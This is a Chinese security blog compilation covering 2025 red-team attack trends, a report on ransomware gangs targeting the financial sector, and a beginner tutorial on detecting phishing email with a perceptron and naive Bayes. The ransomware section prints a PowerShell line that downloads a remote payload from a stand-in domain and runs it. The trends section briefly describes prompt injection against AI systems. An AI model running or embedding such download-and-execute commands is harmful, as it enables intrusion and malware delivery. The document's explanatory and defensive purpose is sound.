1
2025年攻防演练攻击趋势攻防启示录
在大模型技术飞速发展的 2025 年,网络攻防领域正经历着深刻变革。随着攻击手段愈发自动化、智能化,传统防御体系面临前所未有的严峻考验。360 数字安全集团基于大量实战经验与前沿威胁动态,梳理出2025年攻防演练七大攻击趋势,并提出相应防御建议,为政企客户及网络安全从业者提供参考。
1
常规漏洞利用:自动化“利刃”的致命进化
常规漏洞利用仍是红队突破企业防线的“致命利器”。2025年,攻击技术全面升级为“AI+隐蔽化”的双重组合模式,攻击者借助自动化工具快速扫描并利用Log4j 2.x、Apache Struts等公开漏洞,配合横向渗透与权限提升,不断扩大攻击范围。
相较于传统漏洞利用方式,2025 年的攻击技术演进呈现以下特点:一是 AI 化驱动的漏洞挖掘,通过技术自动生成攻击代码,轻松绕过传统安全检测;二是隐蔽化的无文件化攻击链,利用内存驻留技术规避 EDR 监控。此外,攻击趋势也十分明显:
漏洞利用时效性升级:
从漏洞披露到武器化攻击的窗口期缩短至24小时内,企业防御响应时间被极度压缩;
跨协议链式攻击兴起:
通过多协议串联漏洞,突破网络分段隔离,实现“横向穿墙”;
云原生漏洞成攻击焦点:
针对云环境漏洞的利用占比提升,云安全防线面临严峻考验。
2
0day武器化升级,“核武器”击溃防线
2025年,红队将重点挖掘 CMS 系统、安全设备和 OA 系统的0day漏洞。在技术演进方面,攻击者利用强化学习模型批量扫描代码逻辑缺陷,极大提升了 0day 发现效率。与此同时,攻击者倾向于采用多阶段协同的载荷分离技术,先植入轻量级Shellcode,再通过加密信道动态下载核心攻击模块,实现“精准打击”。具体攻击趋势包含:
供应链0day爆发:
攻击者利用软件供应商代码签名劫持,植入后门;
硬件级漏洞利用增多:
针对 CPU 侧信道漏洞(如新型 Spectre 变种)、基带固件漏洞的攻击时有发生;
漏洞利用隐蔽性增强:
采用时间触发机制(如休眠至特定日期激活)逃避沙箱检测。
3
AI驱动的社工:突破传统防御的“软刀子”
2025年,AI 技术彻底重构了社会工程攻击范式。攻击者基于目标公开数据(企业年报、招标网站等),利用AI 生成定制化钓鱼内容,包括伪造业务指令、合同文档,甚至通过邮件、聊天软件、二维码多渠道协同攻击。新型 AI 社工攻击趋势涵盖:
——AI 驱动的多模态生成引擎:整合文本、图像生成模型,批量生产钓鱼素材,实现“精准投送”;
——隐蔽载荷投递:将恶意代码嵌入AI生成的图片/文档文件,实现“无痕攻击”。
4
供应链攻击:立体化渗透的“暗潮”
2025年,供应链攻击突破传统 “单点渗透” 模式,演变为覆盖软件、硬件、服务全链条的立体化作战。攻击者通过二级 / 三级供应商(如 IT 运维服务商、云服务代理商)植入后门,规避直接针对核心系统的风险,甚至利用云服务商 API 漏洞,实现 “一次入侵,全网扩散”。
攻击趋势方面,攻击者通过 AI 扫描目标企业的开源组件依赖树,进行依赖关系图谱分析,自动选择高利用率、低维护频率的库作为攻击入口;攻击者滥用云服务 API,利用 AWS Lambda、Azure Functions 等无服务器架构的临时权限漏洞,注入供应链后门。攻击呈现出多层渗透、攻击范围全域化以及隐蔽性倍增等特点,轻松绕过代码审计。
5
子公司迂回突破战术 借边缘节点撕开防线
2025年,红队更多地将集团化企业的分子公司、区域分支机构作为攻击跳板,绕过总部高等级防护体系。典型攻击路径包括:
低权限入口突破:
通过分子公司老旧 OA 系统(如未升级的通达信)获取初始据点;
横向信任滥用:
利用总部与分子公司间的 VPN 互信策略,横向渗透至 ERP、财务中台等核心业务系统;
数据聚合劫持:
在分子公司本地数据库部署隐蔽嗅探器,长期收集敏感数据并伪装成正常业务流量外传。
6
勒索病毒定向爆破:精准打击的定时炸弹
2025年,勒索病毒攻击呈现出目标定向化、技术融合化、战术隐蔽化的特点。攻击者结合前沿技术与战术,突破传统防御体系。技术革新主要体现在:AI 驱动目标选择,利用自然语言处理(NLP)分析企业公开财报、招标公告,自动识别安全防护薄弱的目标;采用无痕驻留技术,勒索载荷仅驻留内存,重启后自动清除痕迹,规避取证分析;利用自动化工具(如 Fuzzing-as-a-Service)批量挖掘边缘设备固件漏洞;攻击链依赖未公开漏洞(如 Windows 内核提权、NAS 设备 RCE),漏洞利用周期从数周缩短至 72 小时内。攻击趋势体现在:
——边缘节点成为跳板:通过Modbus协议漏洞感染OT网络,实现“工业渗透”;
——移动端成为辅助入口:通过恶意SDK或企业签名的“白利用”应用传播,实现“多端协同”;
——APT 化潜伏渗透:利用供应链漏洞(如第三方服务商、开源组件)长期潜伏,结合Cobalt Strike等工具建立隐蔽C2通道,在攻防演练窗口期集中触发勒索载荷。
7
AI系统对抗性攻击:以子之矛攻子之盾
2025年,针对AI系统的攻击颠覆了传统安全攻防逻辑。攻击者通过不当输出、虚假信息、提示注入、供应链攻击、生成对抗样本等手段,使企业的 AI 安防系统 “自盲” 或 “反噬”。
AI 对抗攻击的核心技术突破包括:攻击方利用大模型服务中代理框架、向量数据库、推理框架以及训练管理平台等软件组件的漏洞,绕过模型策略直接进行攻击;攻击者通过修改输入提示(Prompt),诱导大模型生成不良内容或窃取系统的敏感信息;攻击者通过 API 查询反推 AI 模型决策边界,精准设计对抗性输入。
2
勒索攻击席卷金融行业在数字化浪潮席卷金融行业之际,勒索软件团伙也将目光投向了这座“金矿”。根据Flashpoint发布的数据,从2024年4月至2025年4月,全球金融行业已披露406起勒索攻击事件,攻击者手法日趋成熟,威胁团体组织化程度不断加深。这些攻击不仅对金融服务运行构成直接威胁,更引发了对金融稳定与国家安全的深层担忧。
全球金融体系正面临一场前所未有的勒索软件危机,这些勒索攻击事件揭示着严峻的现实:金融机构正成为组织化网络犯罪的主要猎物。
01
高价值目标的系统性打击
金融机构之所以成为勒索软件攻击首选目标,根源在于其集中掌控的巨额资产和敏感数据资源。攻击者将其视作“高回报、低风险”的对象,往往在发起攻击前进行详尽侦察——分析监管报告、年报、股东文件等公开数据,判断目标机构的支付能力和安全薄弱环节。
攻击过程中,黑客通过鱼叉式钓鱼邮件向高权限员工发送伪装成付款确认、业务报表等的恶意文件。一旦用户启用宏,攻击链即被触发:
$webclient = New-Object System.Net.WebClient
$payload = $webclient.DownloadString('https://compromised-domain.com/payload.ps1')
Invoke-Expression $payload
这段PowerShell脚本负责从远程服务器下载主Payload,后续步骤包括部署凭证窃取工具、进行横向渗透、控制域控系统,并优先完成敏感数据的窃取。
这些攻击背后的经济动机是显而易见的。这些威胁行为者通常根据监管备案数据和公共财务披露来选择受害者,赎金要求通常会根据目标机构年收入的一定比例定价。这种精确的目标选择凸显出勒索团伙高度商业化的作案逻辑。
02
五大团伙主导金融攻击浪潮
过去一年中,五大团伙主导了对金融行业的攻击浪潮:RansomHub、Akira、LockBit、Scattered Spider 和 Lazarus Group。
RansomHub虽在2024年初才出现,但迅速成长为“顶级威胁力量”。仅2024年3月,该团伙就制造近百起攻击事件,其主要手段包括供应链攻击和第三方凭证滥用。
LockBit延续其在全球勒索领域的影响力,尤其擅长“在地生存”(Living-off-the-land)战术,滥用Windows原生工具如BgInfo、PsExec和Sysinternals,以躲避签名检测系统。
Akira则被认为是Conti勒索集团的技术延续体,其代码结构与攻击流程具有高度相似性,展现出前组织的技术血统和战术延续。
Scattered Spider以攻击金融科技公司为主,手段激进,常配合SIM交换攻击绕过多因素认证。
Lazarus Group作为一个国家支持的攻击组织,则呈现出更复杂的战略目标,其攻击往往同时服务于经济利益和地缘政治意图。
这些团伙在攻击策略上不断进化,从滥用合法工具进行隐蔽入侵,到借助供应链渠道达成间接渗透,表现出显著的适应能力,构建出一个越来越成熟的攻击生态。
03
攻击技术手法全面升级
这些攻击中令人担忧的趋势是勒索软件部署策略的快速演变。威胁者同时利用多个向量在金融网络中建立持久性,显著提高了攻击成功率和隐蔽性。其常见路径包括:
针对特权用户的钓鱼攻击与恶意文档投递;
利用未打补丁的远程访问系统(如VPN、RDP);
滥用第三方服务提供商凭证进行横向扩展;
在本地系统中植入PowerShell任务,建立命令与控制(C2)连接;
使用合法工具如net.exe、taskschd.msc等实现操作隐藏。
在渗透成功后,攻击者会部署如Mimikatz、LaZagne等工具窃取账户信息,进而接管域控、加密备份服务器、摧毁恢复机制,确保受害方“无路可退”。
这一过程中,“Living-off-the-land”(“借力原生系统”)被广泛应用。这些攻击者利用本地Windows管理工具的生存策略,将恶意活动与合法操作融为一体,使得许多恶意行为难以被传统防御系统识别,尤其是依赖签名匹配的老旧安全架构。因此,勒索攻击不仅是IT问题,更是业务连续性与行业信任危机的根源。
406起公开攻击事件只是冰山一角。在“勒索即服务”高度产业化的时代,金融行业正面临一场深层次的网络安全危机。顶级团伙的持续活跃与技术手段的持续演进,使得传统防御手段难以为继。金融机构必须加强网络安全防御,及时更新防护技术,以应对日益复杂的威胁。
3
钓鱼邮件检测0x01 前言
为什么写这个呢,源自于我之前在某教培网站留了信息,不出意外的个人信息泄露的飞快,邮箱开始疯狂收到垃圾邮件甚至钓鱼邮件,看着每天的拦截消息,就在想这个拦截机制挺好玩的,拦截器是怎么知道是不是正常邮件呢,结合现在AI有些爆火,于是就学习一下。
0x02 先来思考
我们如何判断一封邮件是钓鱼邮件还是正常邮件呢?像这种
那么我们可以从邮件内容看出来,钓鱼邮件的内容通常是用一两句我们认为比较重要的提示信息+诱导点击链接。 但是,只要出现特征点就一定是吗,当然不是。比如这种就是正常邮件:
所以此时就要引出神秘的三人组:权重、激活函数、阈值
0x03 神秘三幻神:权重、激活函数、阈值
权重:表示特征点重要程度,就像比如当我们看到“bo彩”就会知道这一定不是什么好内容。
激活函数:作用是将加权信号转换为输出信号。人话就是把一堆特征点算出来的值通过线代求和的方式变成一个值。
阈值:通过激活函数出来的值如果大于阈值,则输出为aaa,否则输出为bbb。 这样经过权重的加持下,就可以友好的避免了误伤,文字有点难理解了,那我们就看个表
可以看到,我们给予"点击查看"的权重为3,"更新"为2,而这,就组成了激活函数y=3a+2b,当计算值为5的时候达到阈值,判断为钓鱼邮件。 那么一个新的问题,现在的钓鱼手段层出不穷,对于特征点的权重和阈值也需要实时更新才可以,这里就要提到AI在网络安全领域里的第一个例子-感知机
0x04 感知机(嗯。。赶只鸡?)
何为感知机?
感知机是模仿人类神经元的一个二分类模型,将输入值做线性代数运算求和,并在达到一定值时激活函数从而得出结论。就像人类,看到红色的软妹币大脑就会刺激我们开心,但是打开看到的是印着玉皇大帝的时候又会刺激我们做出愤恨的情绪一样。 那感知机如何做到实时更新的能力呢?他的运转过程大概如下: 1、将权重初始化为预订值,通常为0 2、计算每个训练样本x,并输出y(结论) 3、根据样本中预设的y与输出的y之间的差距更新权重
用感知机实现一下嘞
理论结束,开始实践。首先解决输入样本的问题,这次先做简单的样本尝试一下,特征点就采用“点击查看”和“更新”并预设邮件类型和特征点出现次数搞个一百来行(其实ai生成一下也行)。
import pandas as pdimport numpy as npdf = pd.read_csv('heihei.csv', encoding='gbk')# 读取数据集,注意文件路径是否正确,并指定正确的编码格式y = df.iloc[:, 0].valuesy = np.where(y == '钓鱼邮件', -1, 1) # 此处的where函数由numpy提供,用于将类别转换成-1和+1X = df.iloc[:, [1, 2]].values# 获取特征列(假设第2和第3列为特征)
人工智能嘛必须得训练一下
设定用来训练和预测的数据范围,这里为了看最终效果强制73分了,其实可以随机取70%做训练集。
split_index = int(len(X) * 0.7)# 取前70%为训练集X_train, X_test = X[:split_index], X[split_index:]y_train, y_test = y[:split_index], y[split_index:]#随机取可以用:X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)
输入都完事了,开始实例化感知机,使用scikit-learn库提供感知机模型,给予他最大迭代次数70,学习率0.1,并初始化权重,看他经过训练最终权重会发生怎样的变化。
# 创建感知机实例,使用SGDClassifier模拟感知机行为p = SGDClassifier(loss='perceptron', max_iter=70, eta0=1.0, learning_rate='constant', random_state=0)#初始化权重p.coef_ = np.zeros((1, X_train.shape[1]))p.intercept_ = np.zeros(1)# 训练模型p.fit(X_train, y_train)
使用predict()方法预估值
y_pred = p.predict(X_test)
打印数据看看结果
可以看到结果正确率八成以上,并且权重完成了更新。
意犹未尽,继续思考
刚才说,这其实就是一个二分类模型,说白了就是把所有样本化成坐标然后一分为二,一半是钓鱼邮件、一半是正常邮件,用刚才的例子画成图:
这就有一个局限性,如果点变多了,可能无法找到可以一分为二的地方,就会产生无限震荡(挂了),且这是我提前预设好了特征点,而现在随着技术进步,显然已经不实用了,他应该可以自己从邮件里找到特征点,那么怎么才能解决这一堆的问题呢?
0x05 感知机究极进化
朴素贝叶斯
先看下贝叶斯公式
P(Ck∣x):数据点 x 属于类别 Ck 的概率。 P(x∣Ck):在类别 Ck 下,数据点 x 出现的概率。 P(Ck):类别 Ck 的先验概率(即该类别在数据中的占比)。 P(x):数据点 x 的概率(可忽略,因为对所有类别相同)。 嗯。。把数学基础还给老师了。。。。还是用个例子说下
条件概率:在坏人中,“寂寞”出现的概率:80%(即 P(寂寞∣坏人)=0.8)。在正常用户中,“寂寞”出现的概率:10%(即 P(寂寞∣正常)=0.1)。其他词汇的概率类似计算。 当再出现一个用户写有”寂寞”“约我”“认真”这个词时,
预测坏人的概率就是: P(坏人|账号)=P(坏人)xP(寂寞|坏人)xP(约我|坏人)xP(认真|坏人)=0.7x0.8x0.7x0.2=0.0784,
预测正常用户的概率时: P(正常用户|账号)=P(正常用户)xP(寂寞|正常用户)xP(约我|正常用户)xP(认真|正常用户)=0.3x0.1x0.1x0.6=0.0018, 那么这个账号大概率就是坏人。
而朴素贝叶斯算法,可以动态识别钓鱼邮件中的可以关键字,加上贝叶斯公式的原理,做到动态识别,精准分析。
朴素贝叶斯钓鱼邮件检测器的实现
理论结束,实践开始,首先还是要解决样本问题,这次,我们只需要做出样本的分类和内容就行,大概长这样:
# 导入必要的库import matplotlib.pyplot as plt # 用于绘图import csv # 用于处理CSV文件from textblob import TextBlob # 用于自然语言处理import pandas as pd # 数据处理库import sklearn # 机器学习库import numpy as np # 数值计算库import nltk # 自然语言工具包# 加载数据集,指定正确的编码格式sms = pd.read_csv('yangben.csv', sep=',', names=["type", "text"], encoding='gbk') # 读取CSV文件# 数据集划分:将数据分为训练集和测试集text_train, text_test, type_train, type_test = train_test_split(sms['text'], sms['type'], test_size=0.3, random_state=42)
使用sklearn.naive_bayes中的MultinomialNB实现一个基于贝叶斯的分类器
from sklearn.naive_bayes import MultinomialNB # 多项式朴素贝叶斯分类器spam_detector = MultinomialNB().fit(sms_tfidf, type_train)# 模型训练:使用多项式朴素贝叶斯分类器训练模型
使用 sklearn.feature_extraction.text 中的 CountVectorizer为为文本中每个识别词标记一个数字,并使用get_lemmas提取
bow = CountVectorizer(analyzer=get_lemmas).fit(text_train) # 使用词袋模型提取特征sms_bow = bow.transform(text_train) # 将训练文本转换为词袋表示from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer # 文本向量化工具from defs import get_tokens, get_lemmas # 获取分词和词形还原的函数
因为邮件有长有短,文件中出现过多词会影响计算,就需要使用scikit-learn 中的TfidfTransformer() 将词频计数转换为 TF-IDF (Term Frequency-Inverse Document Frequency) 值,从而把词频归一化并加权。
TF (Term Frequency):词频f(t,d),表示一个词在文档中出现的频率归一化(Normalization):tf(t,d) = f(t,d) / sqrt(sum(f(t,d)^2 for all t in d)),使不同特征在同一尺度上,便于比较和机器学习算法处理 IDF (Inverse Document Frequency):idf(t) = log((n + 1) / (df(t) + 1)) + 1逆文档频率,衡量一个词的普遍重要性 TF-IDF 计算:tfidf(t,d) = tf(t,d) * idf(t)TF-IDF 计算:tfidf(t,d) = tf(t,d) * idf(t)
tfidf = TfidfTransformer().fit(sms_bow) # 计算TF-IDF权重sms_tfidf = tfidf.transform(sms_bow) # 将词袋表示转换为TF-IDF表示
然后先预测一行数据,如第45行为例子,看是否正确
没啥毛病,开始完整预测测试集
# 对测试集进行特征提取和预测text_test_bow = bow.transform(text_test)text_test_tfidf = tfidf.transform(text_test_bow)predictions = spam_detector.predict(text_test_tfidf)
可以看到最终准确率也是高达9成。
0x06 总结
钓鱼邮件攻击手段日益复杂,传统规则检测已不足以应对。未来需结合AI检测、用户教育、企业安全策略等多层防御,才能有效降低风险。机器学习(如BERT、异常检测)在钓鱼邮件识别中表现优异,但仍需不断优化以应对新型攻击手法并且我们自身也需要不断提高安全意识。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...